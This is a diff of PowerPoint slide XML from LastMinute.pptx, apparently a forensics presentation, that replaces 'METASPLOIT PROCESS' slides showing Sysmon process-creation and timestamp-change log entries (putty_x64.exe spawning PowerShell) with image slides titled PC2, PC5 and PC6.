-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>UtcTime</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: 2019-03-26 21:14:43.489</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>ProcessGuid</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: {9CA6D9DA-9643-5C9A-0000-001029551801}</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>ProcessId</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: 5620</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
-              <a:t>powershell.exe</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>TargetFilename</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
-              <a:t>GPTP47LXLWQ9XHJFBNUM.temp</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>CreationUtcTime</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: 2019-02-18 07:25:45.895</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>PreviousCreationUtcTime</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: 2019-03-26 21:14:43.489";"2";"4";;"4";"2";"0";"-9223372036854775808";"589777";"Microsoft-Windows-Sysmon";"5770385f-c22a-43e0-bf4c-06f5698ffbd9";"Microsoft-Windows-Sysmon/Operational";"2236";"2264";"PC2";"S-1-5-18";"26.03.2019 22:14:43";;;"Microsoft-Windows-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>Sysmon</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>/Operational";"System.UInt32[]";"System.Diagnostics.Eventing.Reader.EventBookmark";"Information";"Info";"File creation time changed (rule: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>FileCreateTime</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>)";"System.Collections.ObjectModel.ReadOnlyCollection`1[</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>System.String</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>]";"System.Collections.Generic.List`1[</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>System.Diagnostics.Eventing.Reader.EventProperty</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>]"</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="11" name="Nadpis 10">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F13FAC93-3D71-450F-A35B-84C6B766BAAD}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C364312D-5199-4C2F-BDAA-1BC7D0C31194}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -10788,27 +11373,63 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="64008" y="201169"/>
-            <a:ext cx="12192000" cy="585926"/>
+            <a:off x="76135" y="64009"/>
+            <a:ext cx="12039665" cy="438912"/>
           </a:xfrm>
         </p:spPr>
         <p:txBody>
           <a:bodyPr>
-            <a:noAutofit/>
+            <a:normAutofit fontScale="90000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" sz="5400" dirty="0"/>
-              <a:t>METASPLOIT PROCESS</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>PC2</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="7" name="Obrázek 6">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFCA5EF8-398D-4FB6-B789-E618A500E43B}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2020774" y="502921"/>
+            <a:ext cx="10095026" cy="5792228"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3419150997"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4906789"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -10837,180 +11458,10 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="8" name="Obdélník 7">
+          <p:cNvPr id="2" name="Nadpis 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C82994BB-411B-4118-B7FA-A89CAA13C009}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1516761" y="1834651"/>
-            <a:ext cx="10515600" cy="3600986"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>"</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>CurrentDirectory</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: C:\WINDOWS\system32\</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>User: PC2\user</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>LogonGuid</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: {9CA6D9DA-818F-5C9A-0000-002032380300}</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>LogonId</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: 0x33832</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>TerminalSessionId</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: 1</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>IntegrityLevel</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: High</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>Hashes: SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>ParentProcessGuid</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: {9CA6D9DA-9495-5C9A-0000-00108C710901}</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>ParentProcessId</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: 7660</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>ParentImage</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: C:\Users\user\Desktop\</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" b="1" dirty="0"/>
-              <a:t>putty_x64.exe</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>ParentCommandLine</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: ""C:\Users\user\Desktop\putty_x64.exe"" ";"1";"5";;"4";"1";"0";"-9223372036854775808";"589771";"Microsoft-Windows-Sysmon";"5770385f-c22a-43e0-bf4c-06f5698ffbd9";"Microsoft-Windows-Sysmon/Operational";"2236";"2264";"PC2";"S-1-5-18";"26.03.2019 22:14:42";;;"Microsoft-Windows-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>Sysmon</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>/Operational";"System.UInt32[]";"System.Diagnostics.Eventing.Reader.EventBookmark";"Information";"Info";"Process Create (rule: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>ProcessCreate</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>)";"System.Collections.ObjectModel.ReadOnlyCollection`1[</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>System.String</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>]";"System.Collections.Generic.List`1[</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>System.Diagnostics.Eventing.Reader.EventProperty</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>]"</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="11" name="Nadpis 10">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F13FAC93-3D71-450F-A35B-84C6B766BAAD}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C364312D-5199-4C2F-BDAA-1BC7D0C31194}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -11023,27 +11474,63 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="0" y="210313"/>
-            <a:ext cx="12192000" cy="585926"/>
+            <a:off x="76135" y="64009"/>
+            <a:ext cx="12039665" cy="438912"/>
           </a:xfrm>
         </p:spPr>
         <p:txBody>
           <a:bodyPr>
-            <a:noAutofit/>
+            <a:normAutofit fontScale="90000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" sz="5400" dirty="0"/>
-              <a:t>METASPLOIT PROCESS</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>PC5</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="4" name="Obrázek 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BAF8352-E9C2-4701-8333-0BE4ABD57EA8}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1993754" y="630937"/>
+            <a:ext cx="10122046" cy="5812803"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2741484754"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2113813979"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -11070,12 +11557,47 @@
           <a:chExt cx="0" cy="0"/>
         </a:xfrm>
       </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Nadpis 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C364312D-5199-4C2F-BDAA-1BC7D0C31194}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="76135" y="64009"/>
+            <a:ext cx="12039665" cy="438912"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit fontScale="90000"/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>PC6</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
       <p:pic>
         <p:nvPicPr>
-          <p:cNvPr id="4" name="Obrázek 3">
+          <p:cNvPr id="5" name="Obrázek 4">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E70F9D99-4B42-41B6-AC0E-3C7DE3699F2D}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E06702DF-27C4-46F8-B823-614351CF3BDD}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -11098,8 +11620,8 @@
         </p:blipFill>
         <p:spPr>
           <a:xfrm>
-            <a:off x="2650632" y="0"/>
-            <a:ext cx="6890735" cy="6858000"/>
+            <a:off x="2185943" y="733537"/>
+            <a:ext cx="9812974" cy="5658119"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -11109,7 +11631,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2657531265"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1527036921"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -11136,17 +11658,52 @@
           <a:chExt cx="0" cy="0"/>
         </a:xfrm>
       </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Nadpis 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C364312D-5199-4C2F-BDAA-1BC7D0C31194}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="76135" y="64009"/>
+            <a:ext cx="12039665" cy="438912"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit fontScale="90000"/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>PC6</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
       <p:pic>
         <p:nvPicPr>
-          <p:cNvPr id="1026" name="Picture 2" descr="https://4.bp.blogspot.com/-yoe0lGHrHLk/Wc1Jx2Q6ooI/AAAAAAAABA8/-e75oChj3zYPj9v_hf_Gaa0j5lM1XoBkwCLcBGAs/s1600/Win%2B10%2Bfixed.png">
+          <p:cNvPr id="4" name="Obrázek 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6059BDFC-DCC0-4C24-AB1C-F0626C63F035}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B5482FB-B45C-453A-84EA-5AB7BF57C0DD}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
           <p:cNvPicPr>
-            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+            <a:picLocks noChangeAspect="1"/>
           </p:cNvPicPr>
           <p:nvPr/>
         </p:nvPicPr>
@@ -11158,35 +11715,24 @@
               </a:ext>
             </a:extLst>
           </a:blip>
-          <a:srcRect/>
           <a:stretch>
             <a:fillRect/>
           </a:stretch>
         </p:blipFill>
-        <p:spPr bwMode="auto">
+        <p:spPr>
           <a:xfrm>
-            <a:off x="1684020" y="969408"/>
-            <a:ext cx="8374380" cy="4623356"/>
+            <a:off x="1771275" y="1897247"/>
+            <a:ext cx="8649450" cy="3063505"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
           </a:prstGeom>
-          <a:noFill/>
-          <a:extLst>
-            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
-              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
-                <a:solidFill>
-                  <a:srgbClr val="FFFFFF"/>
-                </a:solidFill>
-              </a14:hiddenFill>
-            </a:ext>
-          </a:extLst>
         </p:spPr>
       </p:pic>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1906597098"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3749704141"/>
       </p:ext>
     </p:extLst>
   </p:cSld>

--- a/LastMinute.pptx
+++ b/LastMinute.pptx
@@ -13,12 +13,11 @@
     <p:sldId id="268" r:id="rId7"/>
     <p:sldId id="269" r:id="rId8"/>
     <p:sldId id="270" r:id="rId9"/>
-    <p:sldId id="271" r:id="rId10"/>
-    <p:sldId id="257" r:id="rId11"/>
-    <p:sldId id="258" r:id="rId12"/>
-    <p:sldId id="259" r:id="rId13"/>
-    <p:sldId id="266" r:id="rId14"/>
-    <p:sldId id="260" r:id="rId15"/>
+    <p:sldId id="257" r:id="rId10"/>
+    <p:sldId id="258" r:id="rId11"/>
+    <p:sldId id="259" r:id="rId12"/>
+    <p:sldId id="266" r:id="rId13"/>
+    <p:sldId id="260" r:id="rId14"/>
   </p:sldIdLst>
   <p:sldSz cx="12192000" cy="6858000"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -6271,8 +6270,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1580769" y="982176"/>
-            <a:ext cx="10515600" cy="4893647"/>
+            <a:off x="1498473" y="1736229"/>
+            <a:ext cx="10515600" cy="3385542"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6285,455 +6284,123 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>"Process Create:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>"File creation time changed:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
               <a:t>RuleName</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
               <a:t>: </a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
               <a:t>UtcTime</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>: 2019-03-26 21:14:44.276</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>Image: C:\Windows\System32\conhost.exe</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>FileVersion</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>: 10.0.17134.1 (WinBuild.160101.0800)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>Description: Console Window Host</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>Product: Microsoft? Windows? Operating System</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>Company: Microsoft Corporation</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>CommandLine</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>: \??\C:\WINDOWS\system32\</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
